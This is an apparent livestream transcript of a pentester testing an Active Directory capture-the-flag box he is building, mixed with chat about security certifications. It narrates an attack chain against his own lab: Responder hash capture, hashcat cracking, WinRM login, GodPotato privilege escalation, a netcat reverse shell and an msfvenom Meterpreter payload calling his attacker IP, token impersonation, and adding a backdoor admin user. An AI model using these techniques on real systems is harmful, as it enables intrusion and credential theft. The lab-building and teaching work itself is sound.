Oh, ho, ho. We're back. We're back. Part two of testing. We're going to get straight into it since I stalled for so long yesterday. Defus, how's it going? Appreciate you checking in. Appreciate you being in the stream again. Defus, as you know, yesterday was not great. Not great for the program yesterday. We're hoping to mitigate as much pain and suffering as possible today and hope our testing goes well. So let's get straight into it here. We are in course stack. I've started my machines. We are going to run through what we move my camera just a little bit, center me. We're going to run through our attack path quickly, just because you didn't catch the last stream. Run through what we've done so far, and then move on to the next path. So looking at, I'm pretty sure they're the same IPs, right? 10, 196, and 190 cat IPs. Okay, so we have the same nmap scan, and this is on the domain controller. So we see all this stuff, obviously Active Directory, and one of the things we check for Active Directory is going to be responder. So sudo responder-i then 0. We always will add the capital I. And I need to stop Apache system CTL stop Apache 2. Really, I should disable Apache 2 so it doesn't start on a startup. So we're going to listen for events. We have HTTP on, we have SMB on, and if any user, I guess I should check my IP too. It's the same one as before. If any user mistypes a directory or looks for a share that isn't there or goes to an IP that isn't there, we will, in theory, catch their hash when that happens, respond to it, and then perform the NTLM-v2 hash exchange, in which we can grab their hash. While that's running, we can run some other basic checks. Like I said, our nmap shows all these ports open, including SMB, so it's worth going through and checking for like null authentication and guest authentication. So netexec SMB. Should probably add this to Etsy hosts as well. DUET that local, that is. I'll just use the IP for now though. Null authentication. See, null authentication does work, but typically it won't actually result in anything. We can't list out shares, we can't list users. We can try with LDAP. Excuse me, we can try with LDAP, see if that works. We see we have operations there, which typically means just, hey, permissions there. You don't have permissions to do this. And we try to list out users and we get that same error. And I'm getting a little concerned at this point because we should have had a hash fly through at this point. I'm waiting for it too. I've stalled as much as I can. Let's double check, make sure they're up. Interesting. You know, I'll give it like a few 40 more seconds or so. Wait for it before we do some troubleshooting. Though to be fair, we haven't actually tried it from startup. I think I just restarted the machine before. Oh, what a shame. What a shame. We're gonna have to go through this bogus again. Hey, part of the game. Part of the game. Looks like it's not gonna come through. That's fine. Not really. Well, let's see what's happening here. It's RDPN as the administrator and try to get a grasp on what's going wrong here. It shouldn't be on login. It should definitely be on system startup. We know last stream our PowerShell startup task did work. I suppose it did not this time around. Let's check in on our scheduled tasks and see what's going on here. Do some investigative work. Gosh, that's a little frustrating though. I was really hoping to move past this today, and I might still move past this today. I don't want to. This may be an off-stream task. Where is Larry update? Triggers at system startup. Good. It's interesting that the location says where it is, but let's click into Larry update. Last runtime was 9 minutes ago. I don't know if I believe that. What's the history looking like? History is loading. Loading. Oh, all that pain we went through yesterday, Defus. All that pain for nothing. Let's see. It says task completed. That was yesterday, though. Oh, here we go. Action started. System 32, Windows PowerShell, V1, PowerShell exe. That looks right to me. Maybe it started, but it didn't complete. So maybe we do actually have to wait a little bit more. Huh. Looks like there wasn't anything wrong here. Like it started properly. But I can't imagine. Let's see the timestamps between. I think it's normal the moment it becomes more complex than very basic. Yeah, task scheduler will kill me if I do anything more than this. So, I mean, you'd think a fella could run a PowerShell script in task scheduler, but alas. I wonder if it's just it needs more time. You know? Like I'm curious. Because we haven't seen task completed yet. So I'm curious to see if like task completed versus action started. So action started is 4:48. Action completed is almost like 6 minutes later. So maybe the action just hasn't completed yet. Maybe that's what it is. So maybe we actually do give it a more time, and we will wait. In the meantime, we can actually start testing our shell and the other path. It's definitely spelled responder wrong, but it's fine. So cat, we nano creds.txt. We know we have Larry Lockstein, 808 local boy. Assuming that we get his hash, crack it. These are our creds for Larry. And we don't actually, he doesn't authenticate to the domain controller. So SMB, I'm going to be reminded of my IP here. If we send an authentication request as Larry to the domain controller, oops, we're going to see that he doesn't authenticate. He is not a domain user. Even if we do local auth here on the domain controller, he doesn't authenticate. So he's not a user on the domain or a user locally on the domain controller. If we try with our other IP of 172.190, this is actually our workstation. And we'll see NetExec actually, this is one of my favorite, like low-key one of my favorite features of NetExec. It will tell you what the name of what the host name is of the station you're attacking or the machine that you're attacking. And I don't know, that just helps me a lot to distinguish from what I'm attacking in my command history. So it's really nice, very underrated in my honest opinion. But from the name and the password, we should be able to figure out, hey, this user is local to this machine. Larry can authenticate locally to workstation 01. And then from there, we can actually use NetExec spray on my GitHub if you want to check it out with all the protocols, this IP. We may not actually authenticate. I don't know if NetExec spray has local, it doesn't. So clearly I haven't built out this tool enough. It doesn't support local auth. That's fine. We'll do it manually. Guess that's something for me to do. So when do we authenticate to SMB, let's think about the important ones. Do authenticate to RDP. Mostly RDP and WinRM. So authenticate to RDP and we authenticate to WinRM. Fantastic. So we'll just go eval WinRM in. I'm not too big of a fan of using RDP in CTFs. I think RDP is just a little, not unrealistic, but I feel like it's a little more limited than WinRM. And I'm probably thinking about that backwards, but usually if I'll have the choice between WinRM and RDP, I'm going to opt for WinRM first. And then if I get stuck, I'll go to RDP and see if there's anything there. Like the person's desktop may have a password or something like that. But WinRM, here we go. And I don't think we need to specify any local parameters for eval_WinRM. It should be able to figure it out. And it does. And our shell works lovely. Okay, and we do actually start getting hashes. So it does take a shocking amount of time for that to start hitting. So action started. Can I refresh this? Refresh. It doesn't even have action completed. It just started. Interesting. I wonder if this works without me logging in though. That's the main concern I have. But we'll try that again later. So we know our hash is coming through. That's good. And we do see it as work 01, Larry Lockstein. So we should be able to infer, hey, that is a local account. If it wasn't local, we would see DUET.local, the domain here, prefixing Larry's account. So we have our shell. We do who am I, and particularly who am I / all. And who am I / all will show us all of the things that we care about, including groups, right? Are we in any groups? You see, we're actually part of the RDP groups. We're part of the WinRM group. We are, and actually, I will remove Larry from the RDP group. I need to make sure to make a note of that because I kind of want to force people into WinRM, and I guess I could keep RDP open. I don't know. I'm trying to think of the downsides of that, the keeping RDP open versus not doing it. I don't think it really matters, but I guess just limiting the options of what people can do. Like maybe there's some weird GUI UAC bypass that is unintended for this box, so maybe I remove it, but we'll see. WinRM, we're part of the users group, and scrolling down, we also have privileges, and we do have SeImpersonatePrivilege because we're a part of the IIS users group, which is an HTTP group, and that kind of folds into the authentication requests we're sending out in some weird, twisted, backwards way, where these are, I don't think it shows it because we didn't do verbose, but these are like HTTP authentication requests as opposed to SMB, which is what you'd normally see. What do you use inside the script to make the SMB connection? Maybe you just set a timeout if possible so I can go through all the IPs quicker. So I'm pretty sure I'm just using, let's see. Let's look at that script again. Because I kind of blacked out yesterday with how poorly it was going. So Larry update.ps1, and actually we could just look at it in our shell since it's C public holy cow. C user, oh my gosh, I cannot type today. Users public Larry update.ps1. Permission denied. Okay. Looks like I'll be looking at it from here. So yeah, we're not sending SMB connections, we're actually sending like web requests. Because SMB has an auto timeout with what we learned yesterday. So like you can't spam SMB requests, but you can spam web requests. And the timeout is 1 second as of now. Yeah, there's already a timeout. So it runs like it'll send connection requests to all the IPs in this range with a 1 second timeout max, and then that'll just repeat every 60 seconds. Yeah, I don't think it's the script problem. I think it's more of task scheduler. Like I think it's Windows that is saying like that's being slow. Because once the script runs, like we saw it in our responder, like it's gonna run every 60 seconds, give or take. So I don't think it's the script. I think it's actually starting the script that was our problem. But yeah, we see here it is HTTP traffic. So not entirely something you see every day, but it guesses the hash, and that could explain the IIS users, which could explain SeImpersonate. It's still incredibly chunky, cheesy, weird, but it gets the job done for learning responder, for learning this kind of stuff. So that's the goal at the end of the day, education. So realism will be part of my next box, I promise. I promise. Yeah, and like this is running pretty frequently, so that's good. Maybe set a startup delay on the task schedule so everything is started up before the script starts. What do you mean? Oh, like having, so like putting a delay on our task, so like all the other servers like LDAP can start up and AD can start up. Is that what you're suggesting, Defus? It's like giving the rest of the box time to boot everything up before. Yeah, I think you can do that in test scheduler. You're probably right. Let's see. That's a good idea because it may be trying to. Well, I don't. Oh, it's worth a try. Definitely worth a try. So let's see here. See what we can do. Properties. Configure for 2008. Probably do that for Windows 2022, I guess. Triggers, actions, conditions. Start the task only if the computer's AC power. Wake the computer to run this task. That might actually be our problem. I'm gonna check that as well. You think it's on triggers? You're probably right. Okay. Triggers, edit. So task, begin the task at startup and delay the task. Yeah. For how long do you think, Defus? Maybe like 3 minutes, 5 minutes? Wrench, how's it going? I love your name. Wrench. Like you're just straight to business. That's crazy aura. How you going, Wrench? That's a cool name. Wrench. Yeah. Need 2 minutes? Yeah, I was thinking 2 or 3 minutes for sure. All right. I don't know where that went. Hopefully that's saved. 2 minutes. We're delaying the task. Cool. Activate. Do you think this could be the problem? What is activate? It seems like remove activate. Yeah, that seems a little odd. Okay. I think we're good here. Yeah, I don't know. Like I don't see the use case. It looks like a scheduled task for a certain date, but that doesn't make sense if we are starting it at startup. So I've changed a few things here. I changed wake computer. I've changed something else. I changed wake computer. We changed the delay, and I also changed configure for and updated it to Windows Server 2022. All right, hopefully we have more results or better results. Thank you for the suggestion, Defus, as always. This box really wouldn't be made without you. Okay, we'll close task schedule for now. Close this for now. We can let that go idle. Back to Callie. Thanks for the compliment. I watch your videos a lot, and thanks for the videos. It helps a lot. Hey, Wrench. It's really my pleasure. And I'm glad you enjoy the videos. I'm glad they help. Out of curiosity, what videos do you enjoy the most? I'm kind of in a crisis right now with what kind of videos I'm making. Because I passed the OSCP 4 months ago, and I feel like I made many OSCP videos. Too many, some would say. So I'm trying to branch out away from OSCP and certifications and into other stuff, but I don't know if they're as cool or as helpful than my OSCP videos. So out of curiosity, what videos in particular helped you the most? Okay. Anywho, here. Who am I/priv will show us our privileges, and we see we have SeImpersonate. Of course, there are many attacks that come with SeImpersonatePrivilege, but the main one is the potato attack. I have a tool on my machine called God Potato, which I hold on, I'm gonna go full screen for a second because I used God Potato on my OSCP, and if I locate godpotato.exe, I don't know what will come up. So I'm going to wait on that. Okay, I'm just transferring files to this directory. Okay, we're going back. Okay. OSE when? I don't know if I want to do the OSE. I mean, isn't OSE... Guys, honestly, I get lost in what these freaking acronyms mean. OSE OffSec. Is that their exploitation one? Like, exploit development? Most challenging and advanced course. Designed for experienced penetration testers, ready to tackle exploit development. Guys, I mean, I don't know if that works for me. I don't know if I'm ready to take the OSE quite yet. Dudoka. I mean, it means a lot that you think I could take that, but I don't know if that one's for me. Are you not looking for a job yet? Oh, I'm looking. Well, I'm kind of looking. I'm in a weird spot right now. I'm partially looking, partially have stuff lined up in the future. So I've got a few opportunities that I'm looking at, but nothing is official yet. The full path of the OSCP AD network will come up. I mean, with the way how I structure my like Kali directories, it's very possible that something bad would have come up that I would have gotten in trouble for. So better safe than sorry there. I love the OCP videos. They provided a lot of content on how to think and approach the exam and the HackSmarter lab solves. Okay. I mean, yeah, those OSCP methodology videos actually were one of my favorite videos to make. I think they're also one of my best videos because it's such a different perspective on what hacking is, especially for the OCP. It's like before, like people have done checklists over checklists, like people have done that all the time, but I don't think many people have actually gone through the methodology and drawn it out like that. So it was one of my favorite videos to make, and I am using the tablet more or my laptop more to draw in the videos because I think it makes it more engaging. I think it makes it more easier to follow. And it's fun. It's fun for me as well. I don't draw a lot. I'm not very good at drawing, so it's a skill to practice. You have to take the in-person training to do the OSCE. What is the in-person training like $4 billion as well? Is that also a caveat? CISSP when? Probably never, to be honest. I don't think I need the CISSP with the career I want to do. And I have friends that have taken the CISSP, and I've heard that it's not very fun to study for. It's very much like very like managerial, very high level manager stuff that doesn't seem particularly interesting to me. And it's definitely good to know. But I feel like I have a good grasp already on the general topics that CISSP covers, but I don't know if I want to get certified in it. Do you think people should learn evasion techniques for pen testing jobs? I definitely think so. And I think that I need to also learn evasion for pen testing. I'm not very good at it. I haven't spent a ton of time learning evasion, but I'm still very new to the field. Like, I know I present myself as a subject matter expert sometimes, but the reality is I've only been doing this for like 2 years, 3 years. So I'm very new. I'm still a noob. I don't know everything, and I never will know everything. But I mean, that's why I have this channel, to learn and teach and get better. So yeah, I think people should learn evasion. I think I should learn evasion. And hopefully I will learn evasion soon with CRTO. Have you ever thought about doing cloud pen testing? I've done it before. In the OSCP Pen 200 course, they have a cloud pen testing module, I guess, or like chapter kind of. So they teach you how to do it, and then there's a few labs. I did not like it personally. It was AWS pen testing, and I did not like it. I just couldn't figure it out. I couldn't put the pieces together in my brain, and I didn't like it at all. But hey, I definitely think that it's a platform or a type of pen testing that I need to learn. Like, I think cloud pen testing is definitely the future. As we phase out of traditional AD testing, cloud pen testing is definitely the way to go. I think I'd want to learn Azure first before I learn AWS, because I don't know what it was about AWS. I just couldn't grasp it. Like, I couldn't do it. But I definitely have to revisit it. Definitely have to try to learn it again. But I want to learn Azure first before I do AWS. We don't have any cheap platforms to learn evasion. All costs upwards of hundreds of dollars. I don't know. I feel like, doesn't HackSmarter have a lab on evasion? I feel like I saw a HackSmarter lab with evasion, but I don't know. I mean, hey, maybe my next lab that I built for HackSmarter will be an evasion lab near Tokyo, just for you. Just for you. I'll build an evasion lab, and we can all practice together. Because I need to practice too, dude. I need to practice too. Forward sec, I'm gonna be honest. I wish I could read that. One of the things I'm trying to work on in life is being multilingual, but I'm a noob right now. I only speak English and read English. So I unfortunately have no idea what your message says. And I'm not even going to guess what language that is. I have an idea, but I'm not going to guess what language that is. Avoid being offensive. Oh, okay, guys, hold on. Thank you for all the chats. I love speaking to you guys, but let's get this frickin' exploit down. Okay, we're in documents right now. Let's upload God Potato net35 and see if we can just get a system shell. And to be honest, I think we can do this with Meterpreter as well. Like, we can just do a Meterpreter shell and then do the auto exploit, the auto pervesc. I forget what it's called. It's called auto, or it's called get system is what it is in Meterpreter, but I like doing the manual way, running this, and I actually kind of forgot the command, so okay. it looks like we're gonna do it the interpreter way for now. So let's do MSF Venom. Or do I have to do that? I get it, yeah. You know what? I'm gonna read chat. We'll come back to interpreter. Hope when the day OSE comes, you're still making videos. It's been great to watch your growth so far. I appreciate that. And that's a fun goal to set out for. Until Defus says it seems like the training's $11,000. Oh, heck no. What the heck, dude? $11,000? I could buy a car with that money. Yeah, Dudoka, I hope I am making videos for a long time. It's fun, and I haven't hit the point of burnout yet. Like, I've been making videos pretty much since the start of the year, and weekly videos too. It was my goal right now to make weekly videos, do weekly streams, and make some short form content as well. So I'm doing like 4 or 5 pieces of content for my channel every week, and I haven't felt burnout yet. And there's weeks where I miss stuff. Like last week I didn't stream at all. But I don't know, it's been fun so far. I like teaching. I think I'm pretty decent at it, so I think I'm having fun, and hopefully my goal is to do it for the rest of the year. Like weekly videos for the rest of the year, but we'll see how that goes. But yeah, I hope I'm making videos for a long time, because it's fun, and like I love this kind of stuff. Like we're in this lab, we're building the CTF, but in reality I'm just talking to chat, and it's the best. Defus, at that point you have the level of skills that earn you enough money. Yeah, that's what I'm thinking as well. Like do I really want to pay $11,000 for this course and cert, or do I want to work for a week and not pay that money? The HackSmarter videos on AWS are nice. I'm doing those in Pwn Labs. Yeah, Tyler definitely will do a good job with AWS. I know he is pretty good at it, pretty proficient at it. So I definitely will check those out. Yeah, I don't know. I really don't know what the problem was with AWS for me. I just couldn't figure it out. I couldn't get it to work. But I think I was just tired and grumpy or something. Definitely have to revisit it. Fried chicken. Cool videos. You want to participate in Pwn to Own one day. Fried chicken, welcome to stream. Similar to Wrench. I love that name. Fried chicken. Like, heck yeah, dude. I haven't had fried chicken in so long. Dang, making me hungry. But actually, I would love to compete in a Pwn to Own one day. Those competitions and events seem so fun. And I don't think I'm good enough for it yet. Like, again, I'm still a noob. I don't know that much. But competing in a Pwn to Own or participating in a Pwn to Own would be so fun. I've also wanted to actually... one of my projects that fell off months ago was making a malicious website that was similar to Pwn to Own, or it was like one of the older Pwn to Own competitions. I was listening to a Darknet Diaries podcast where they're like, yeah, the goal was to compromise in a browser just by that user navigating to the site. So if you hit the website, then your browser was compromised. And I wanted to build that. I wanted to build a malicious website that was so powerful that on older browsers, at least, you visit the website and you're just toast. So that was one of the products I wanted to do, inspired by Pwn to Own. But I mean, Pwn to Own project, and remind me if I'm wrong, but Pwn to Own does a ton of cool stuff now with like cars and stuff, right? Like it's just like hacking anything, right? Because I think like car hacking, satellite hacking. I mean, think about the Artemis 2 mission that NASA just launched. Like satellite hacking and space hacking may be the next big thing. So remind me if Pwn to Own does that kind of stuff. You should also do the OSE 3 courses before OSE. So that's another $6,000 to $8,000. Yeah. But to be honest, 20K is nothing compared to the school/uni cost. So having OSE and my Cali turned off. I've been talking for so long that my Cali just turned off. Nice. OSE will 100% give you a well-paid job. Yeah, I don't know. I don't know if I could justify paying that much for OSE because I feel like here's my thought process. If I am skilled enough to think, you know what, I think I can do the OSE. I think I can do the OSCE 3. If I'm skilled enough to do those, surely by that point I have a job where I'm practicing those skills. Surely I have a position in which I am like able to perform these actions at a competent level. So do I really need the cert at that point? If I'm already practicing the skills and I'm already proficient in them, do I really need the cert to prove I can do it if I already have a job? Just learning more stuff and gaining the highest level of cert? That's a good way to put it, Defus. That was very wise. It's very wise. You can always learn more. That's right. You can always learn more. I don't know if I'm willing to learn more at the cost of $20,000, but I mean, that's just between you and I. Yes, you can pwn a Tesla. That's what I'm talking about. And that's the one reason why I don't think I'm going to buy a Tesla. It's just a giant computer. And every car nowadays has a computer in it, right? But Tesla more than anything else. Like that is you're just driving a computer on wheels. And as we know, all computers are hackable. So I don't know how keen I am about, driving a Tesla knowing that I can just hack it. But yeah, I would definitely love to do those pwn to own competitions. Maybe when I'm a little bit better at hacking. Okay, where were we? I am trying to privilege escalate. If we have my/priv, we have SeImpersonate. I tried to upload on net 35. I'm gonna try uploading. I'll go to my desktop actually. I'm so stupid. Actually unbelievable. Actually unbelievable. Upload net 4. See if this works. And if this doesn't work, then we will just okay, that works. Cool. So net 4 got potato -cmd. There's cmd/c. Who am I? It says test, and we should get system. And current user is NT30 system. So we have a working privesc. We can now execute commands as system. To do this, I think there's a lot of ways from here in which you can get like a reverse shell or some kind of thing. I think I'm going to try to think the best way to do this. I'm thinking of, usually when I do this and I have SeImpersonate, I like to add a new admin user, but I don't know how that will impact the box. Like I may have to go and clean that up. So maybe instead of adding an admin user, I may actually just do the interpreter shell. Because I think it does auto cleanup, which is what I want. Amp, welcome to the stream. Is it good to go from 0-point red team operator 1 if you have 2 years of web app pen testing experience? Or is it good to go for 0-point red team operator 1? Let's do some research together. 0-point red team operator 1. Is that CRTO? This is CRTO, right? I presume. It's the same thing. If it's the same thing, if this is CRTO, then I would say, yeah, it's CRTO. Okay. I would say it depends on what you want to do. So you say you have 2 years of web app pen testing experience. Are you looking to expand into a different, like, are you looking to eventually become a red teamer? Are you looking to expand your pen testing capabilities into other fields? Because if that's something that you're looking to do, then I see no harm in doing the CRTO. If you want to expand your arsenal, I suppose. But if you want to stay in pen, like, I don't think the CRTO will help you be a better web app pen tester. I don't think that's what the cert's built for. But if you're looking to expand, maybe switch careers, then that is definitely not switch careers, but kind of do a small pivot inside your inside of your already existing career. Then I could definitely recommend the CRTO. Doesn't Capita have a built-in rev shell function? Let's find out. God. No, but it looks like we can just upload netcat and make one. So let's do that. Shall we? So I'm going to go back here because I don't know where netcat is on my machine. Yep, as expected. It is in an OSCP directory. Okay. Back here. Let's upload netcat.exe. And then copy and paste that command. Potato. Here we go. Netcat, CMD, and we're going to RIP, which I think is 10. It's on a responder here. 10.217.140. 10.217.140 on port 444. And I like to go horizontal here. Oh, you can't see that. Okay, I'm gonna go vertical here. Penelope 444. And let's see if we get a shell. And we do. So who am I? Nobody, apparently. Nice. So we do have a basic shell. Where am I? /all maybe? Oops. Goodness. Interesting. So we don't actually see that we're system, but I'm sure we are. I'm sure we are system. Like cdc users. Like we can probably access files that we shouldn't be able to access, like the administrator. Yep. Desktop. Yep, as anticipated. And I guess I should throw a flag here. Being, I guess this really isn't user.text. Oh, sure it is. I make the rules. Blah, blah. Save that. And then back to Cali. To dir. And we have user.text. Cool. So this is the path to user. So we know SeImpersonate works. That's good. And there's obviously a lot more other things you could do with God Potato. This is just the basic, just getting a reverse shell. But it's nice that that works. DFIS, I haven't done CRTO, but I recognize it as a cert to learn about C2 frameworks primarily. Yeah, that's my take as well. Definitely learning about, as we learned yesterday, Cobalt Strike is what CRTO teaches. So, and yeah, that's my primary reason for taking as well, learning about C2s. I think if you go for red team, you just want to know if it's beginner friendly for someone who has less experience with network testing, and the course is good for beginners or not. Yeah, that's fair then. I definitely think out of all the red team certs, I think that CRTO is the most beginner friendly, but I don't know. It's hard to say because web app pen testing, I feel like naturally you need to understand some aspects of network pen testing. So I think while you could do CRTO, it may be worthwhile to look at other network certs first, or like AD certs. Like the PNPT, for example, their course is great for teaching fundamental stuff. Like if you have really no idea how to do Active Directory pen testing, because I think CRTO is AD based, if I'm not mistaken. Defus, I'm sure you can correct me on that, but pretty sure CRTO leans into AD. And if that's the case, then you can do one of those courses first, one of the AD courses first, and then move to CRTO, just so you have a more of a well-rounded foundation before jumping into things. But again, I would check the syllabus, see what it actually is you're learning in the CRTO before buying a completely new cert to start. Lauer, it's good to see you, man. Good to see you. I'm good. How about yourself? Man, it's good to have you back. Good to have you back in the streams. I'm glad you could make it. Now completely shut down and start again. I don't know if I want to do that. Anyway, looking here at our Notion, this was the plan for yesterday. SeImpersonate, we can now check that off. Last thing I'm gonna do is see if we can dump hashes. And I guess I should get Meterpreter for that. So we're gonna restart the machine. Or no, I'm gonna try Meterpreter first, and then we're gonna restart the machine. So let's exit here out of Penelope. MSF Venom. And let me just search for my MSF Venom command, because I am too lazy to remember it. Here we go. MSF Venom. This. And we're going to go to Windows x64. I want Meterpreter. Meterpreter. Reverse TCP. lhost is going to be, gosh, I forgot already. 10, goodness gracious, what is it? Up here. 10, 217, 140, port 443 is fine. And we'll do met.exe, compile that. We're gonna upload met.exe whenever it's done here. And then we're going to SF console. I feel like I have a command to do this. MSF console. And you guys would be able to see my Notion, but again, like I'm looking at my OSCP notes. So I feel like I'll just do it still fashion way. I feel like I'm really, treading the line between what is allowed and what will get me banned forever from the OSCP and get my cert revoked. So you're not going to see my notes for now. Multi-handler. Set payload. I swear some of my switches are not working on my keyboard. They just don't work. Setting our payload. Set lhost 1010 10200 17140. I'll port to 443. And then we'll start our listener. And then we're going to use God Potato once again to just run cmd. What was the first command? cmd /c c users Larry lock scene desktop met.exe. We have our listener. We have our interpreter shell. We run it. It did not work. Lovely. Let's try again. What if I just do this? Met.exe is not recognized. What if I just specify the file name? Do I even have it here? I guess I should check. Okay, it is here. I was afraid I got nuked by antivirus, but we already turned it AV off. So desktop met.exe maybe. Well, I guess we can just do our previous command, and then we're gonna get another shell here. Our previous command to get a shell, and then we're going to go to that desktop, see, and then just run it that way. We're real. Oops. What am I? Whoa. Just disappeared on me. We're really taking the long way here to do this. I definitely am missing something silly. But that's okay. It is okay. Maybe not. Can I just run it? Did I compile it correctly? Let's see. Windows 64 interpreter reverse TCP. 10.200 17.140 443. 10.200 17.140 443. exe met.exe. What if I go into PowerShell and then try it? Because I actually don't know the CMD syntax. Interesting. Very, very interesting. It's time to go into the notes, go into the Notion, and see if I can solve this here. Let's search for God Potato. I know I've done this before. Our worst case scenario, we just create a local user and call it a day. I would really love an interpreter shell. That'd be great. So I'm going to search for interpreter. Let's see if I'm doing something wrong. See if I'm doing anything wrong. don't know, things look good. I wonder if it's just like not properly executing through God Potato. Like, I don't think I can actually run a file. What's wrong? So I'm trying to get a interpreter shell here, because that eventually, like, through the interpreter shell is what we're going to do token impersonation with. I'm trying to just do it straight up through God Potato or through this shell. But it looks like I may have to do a local user, like create a local admin, and then WinRM in there. I guess we'll do that. We'll do that using netcat. Yeah, so this shell on the bottom right is netcat. This one is through WinRM. So I wonder if, I mean, I also tried just running the file with CMD. I wonder if I can just do, I wonder if I try PowerShell. Let's kill this. Oops. Yeah, met.exe is interpreter. Yeah. PD desktop. So let's run God Potato. I'm gonna try this one thing, and then I'm gonna add a local admin and just use that. It's a little bit easier. CMD is going to be CMD/C. Or I wonder if I can just do PowerShell. PowerShell.exe, and then running our interpreter. It's kind of like a weird daisy chain of stuff. Just to see if it works. Yeah, it looks like it's starting the process, but it's not actually running the executable. I'm sure there's a clever workaround for this, but it's fine. I will just create a local admin. Which I will find the command for now. Maybe. Let me find it. Yeah, no, I can't run God Potato directly from God Potato. Or I can't run, sorry, interpreter from God Potato. I just said the same thing. Which is interesting. It says the process is starting. But it's yeah, it's not hitting. Which is odd. Definitely odd. Make sure I have the right IP. 10.217.140. 10.217.140 on port 443. Yeah, it's weird. It is very weird. Windows 64. Interpreter reverse TCP. 10.217.140. Port 443. Interesting. Well, that's okay. Let's just add a new user. And if I need to clean this up later, it's fine. Net user, call it nth, password 123, add. Task completed successfully. And then net, I think it's net group. Let's see. I did this so long ago, I forget. Okay, here it is. Net local group. We're gonna add them to the local administrators. Net local group administrators /add. Command completed successfully. Now if we go over here, we do exec SMB. I always forget the IP. Here. -u nth -p password 123. And then it should be local auth. We should get the lovely, okay, or not. Did I type the password wrong? I missed an S. Nice. Or I added 3 S's. There we go. So we can just do this, and then we should be able to evil WinRM in as this user that we just added. And then from this shell, we should have the privileges to, I could probably just do ps exec at this point as well from interpreter, but I want to try to get the interpreter shell working. So if we cd into Larry's directory, and then run interpreter, oh, we're getting warnings. Holy cow, you see all those warnings? Maybe that's the problem. We have a version mismatch. Well, we got an interpreter shell. Get UID. So we're nth right now. Obviously, we're gonna be able to get system from here. Oh, that's not even what I wanted to do. Wait, okay, I'm being actually such a, I'm actually so stupid for that. Okay, hold on. We wanted to use get system. Oh my gosh. Okay, as Larry, I cannot believe I said that. As Larry, we want to run interpreter to get a interpreter shell as Larry. Here we go. Goodness gracious, that was so silly of me. I cannot believe I just spent that long doing that. Okay, we now have a shell as Larry on local workstation. Looking at our Metasploit commands, we're going to use the get system command wherever it is. Here it is. Get system to attempt to elevate our privileges, but if we do /priv, I'm sure there's a command for it. Hold on. Get privs. We see we have impersonate privilege, so we should be able to get system through that. And we do, it's the print spooler. So now we are system. Holy cow. That was so silly the way I just did that. I actually cannot believe I just forgot what we were doing there for a second. Okay. All good. We have system now. So now what I want to do, what the goal is no, that's not the box. So we're still on the local machine. We're still on the local machine, right? We're still on workstation 01. Let's hold on. Excalibur, my favorite website. Here we go, my diagram from yesterday. So all of this is happening on workstation 01. So we have yet to make this pivot. So that's just workstation 01. We now have system on workstation 01. From here, I want to try hash dump and see what comes up. Okay, perfect. But now I want to do token impersonation. So we're going to load incognito and then list token statue. No impersonation tokens available. So to fix this, this is kind of where we're stumped. And this is where I'm going to restart the machine and actually end here. And then we're going to move on. So we're going to redo this entire attack chain. First, I'm actually going to remove that local user that I just added. Users. And remove. Okay. So I'm going to stop the entire system, restart it. We're going to run this attack again, and then we will go from there. And I should probably be doing this in like an instance. I think there's a way in core stack where we can create images for testing, and I probably should be doing that, but it's okay. I'll just do all the manual cleanup myself, and we'll go from there. But that's the first part of the box. That's to get the user flag. What is going to be the level of this box? This is going to be an easy box. It's going to be easy because the attack chains aren't crazy difficult. I mean, when we're going through it, and like when we're going step by step through it, it can seem difficult, but it's not that bad. So we have it's going to be easy, maybe medium. It depends on what Tyler says. Like, for example, my first machine that I made building magic, or maybe it was welcome. One of those machines, I said it could be a medium, and he downgraded it to an easy, which I agree with. So this one, I'm probably going to start it as an easy, and we'll see if it gets upgraded to a medium, but it's either going to be easy or medium, because it's like 4 steps to domain admin, so not too crazy. Okay, we are running our systems. Our systems are running. We are going to start responder. Typed Cali wrong. And listen for events. So we're going to see how long it takes here. So it's 12:15 right now. We're going to wait to see how long it takes for the hashes to come in, if at all. So this is going to be the boring part of the stream. So if you guys have any questions at this point, now is the best time to ask them. And I'm also going to be making sure I'm not missing anything on my mobile device. So I think I'm going to give this till like 12:20. And remember, we did set a delay on the task starting, so it should take about 2 or 3 minutes to get things booted. And the idea is, oh, let's frickin' go, dude. That is so electric. That is so electric. Great suggestion though, DFS. I think the changes we made actually were huge for the task schedule working. I appreciate the suggestion. That was some very wise. I want to get better in AD. Should I keep on doing Hack the Box Windows boxes, or should I do a course? I think you should do a mix of both. That's what I did. I did Hack the Box as well as the PNPT. And between those two, it's like I was learning a lot of techniques and such and practicing them in a lab in the PNPT. But going out to Hack the Box and actually seeing them work in a more real situation was very rewarding. So yeah, I think both. Wrench. All right, we're gonna go here, nano hash.text, paste in our hash, hashcat m8900 hash.text, and hopefully it doesn't remember this hash. User share where this rock you. Hash just can start up. No hash is loaded. Is that so? Did I copy it wrong? Very possible. Very possible I copied it wrong. Nano hash.text. Try again. I think 8900 might actually be the wrong one. Now that I think about it. Hashcat examples. Nets, NTLM. Oh, that was that. That's 5600. I don't know where I got 8900 from. Bye, man. Thanks for the advice and videos. Nighttime for me going to sleep. Thanks again. Hey, Wrench, thank you so much for tuning in, bro. I appreciate it. I love your name. Tune in again later. But yeah, I'm glad I could be helpful, and I'm glad you find my videos helpful. And yeah, thanks for tuning in. I appreciate it. Yeah, we find this local password, 808 local boy for Larry Lockstein. We can check like negexec evil winrm, or negexec winrm rather, on this IP that we found here. You, Larry Lockstein -p, our password here. And then local auth, because we know it's a local user. Let me see, we have pwned. Evil winrm in. winrm. RIP. Then our username and password. We're in. I'm going to remove this file. I'm also going to remove PowerShell. I have a lot of cleanup to do here, but that's fine. There, in theory, I'm going to remove that netcat as well. In theory, let's say we already upload. I'm also going to remove got potato. In theory, we upload a interpreter shell, and we can go over here, MSF console. Should close this out. MSF console. We're going to use the multi-handler, set payload to be Windows. Oh goodness. Windows 64 interpreter shell, interpreter reverse TCP. Set L host to be 10, 200, 17 to 140. Set L ports. I think we set to 443. We're going to listen. We're going to run interpreter. I ran it twice. It looks like I need to update my Metasploit, but whatever. We have our interpreter shell open. We can use the get privs to see that we have SeImpersonate. Then we can use that to get system, to get a system shell on the machine, get UID. We're now system. We can CD to, like, we can cat out C users administrator desktop user.txt to get the administrator flag. Administrator desktop user.txt. Feel like that's typed well. Oh, it's tripping out. I just go no shell. ABC desktop there type user.txt, and we get our user flag. There we go. Scream done. Boom. A lot more successful than yesterday, but then again, we haven't really we haven't done much on the configuration side of things. But yeah, I don't know why my chat wasn't on for this, but here we go. But yeah, that's gonna be it. Tomorrow, not tomorrow, whenever I stream next, later this week, probably Thursday or Wednesday. we're going to keep building out the box. We're going to do the second part of configuration to make sure we are doing everything 